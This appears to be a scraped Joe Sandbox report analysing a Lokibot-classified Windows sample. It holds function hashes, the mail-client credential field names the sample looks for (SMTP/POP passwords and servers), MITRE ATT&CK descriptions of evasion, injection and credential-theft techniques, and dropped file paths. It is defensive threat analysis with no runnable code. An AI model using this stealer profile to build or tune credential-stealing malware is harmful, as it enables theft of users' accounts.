API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopAccount, xrefs: 0040D0B6
SmtpPassword, xrefs: 0040D117
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099
SmtpServer, xrefs: 0040D0DC
SmtpAccount, xrefs: 0040D0FA
PopPort, xrefs: 0040D0A7
Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
SmtpPort, xrefs: 0040D0EB

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SCB#89940578.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SCB#89940578.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Windows Analysis Report
SCB#89940578.exe

Function 04F38D08 Relevance: 40.6, Strings: 31, Instructions: 1826
COMMON

Function 04F38CF9 Relevance: 40.5, Strings: 31, Instructions: 1760
COMMON

Function 0737FB3D Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 0737FB48 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 029844E4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 04F34050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 0737F8B8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 0737F8C0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0737EEB0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 0737F9A8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre